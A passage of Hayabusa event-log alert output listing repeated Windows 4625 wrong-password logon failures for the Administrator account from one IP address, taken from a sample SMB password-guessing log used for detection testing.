NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIJU9xbr1klIvvdE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLKVR3mW3g3utO4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNm4tVG8bV7e9gbB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JtU0PCr9K5DXFYV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CH3BWNPEWlw52Gb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: vQTYqFKBz6YEWhF6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkj3u8ODgLD7xQ5R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9uyze1uO0zuNNUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmL15i3edXHcUamI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7xjFRjv9rDhiXJ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6BmQhVEv8g7EKu1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOMmG87cDO1NFg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO55KfkORhxFORvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D64wDbqkqmzWuUSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sIDgNIlGA0cOkBOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i0kXPQ6s7CGe4QGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HW5jP389jmqSkzF1 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enhsof25BdDPcI2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4acsPMLUJRrT7mmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hi1dzny6hpyr5N3d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RlPVBSnDMlE0QZaJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th72TwMoRXtDVWge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: KGTTiJSkErjzoUUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyzZwNLltF0cYnai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gYWVQ6mCqyBfDm3m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rg2x2lv9JeS5Bb6l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fU28NKC3WYxFGbMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUWDXgnogGDXizWj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXhAtnNcQKOIsuGS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cKfrJwI3OGdjL4af | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VdekC160hU7YzrK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enOBuzd6jwu8rZCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAjLjDlZSps5D49t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rY6CONLBVygSTnY5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6FIHgz2yqqbD9zfV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d82RRXgSmZdnfa8I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xA3ZWnWc9CoGeKpm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvSYKi8KvEtnmSbs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IvxXI1u0AwtNHNSU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: OFIy6Cps3Rm87Kqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: slL3aPBnZl3lVJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O98P1oP3AU4lZp2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EZZ7wIJNZ0CG7fMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7RhwHCqXQytvcaom | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xumaxbBEMZqL6pPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ur1yZIwgB3ecNJGw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAuGcKYRcLe0z3bl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmMi0edfBJ8KoJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnoKbUb9jiqJD7t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hBeWGNkWTSp3nje8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2iwM6jPgNjZ3q5qb | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xdkrA9Kwzero8eSk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tb2ZvuJMxOfsxIT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PBMBRPdATYpLNmyI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P1CKprAPSw4hgiBB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8qtzwuGJfQG4XB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: auOf2GwkoymLh4bC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YcMYQ4sA2GfMwCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YL1iM6WUtZIjIoTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7ruxdEGdeP3RLqF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZFXBpUJzafGYIggt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MC1K9nNLupH0NuSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rVfBLm10US9II19 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SBhAVHHtR7lZ1C3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKuUH8lMELYHibxF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UytgJLBtGRMCf3ar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yno9399gUI2oBr4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbsqE98qy27Sp0UJ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RjXtDnXvCXSJ2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EdRXJJ1RCl8n9bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tnwGNp2ncfcBlFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iGKEloPpd6CtrSlg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBvHz5iKl0dl97xj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
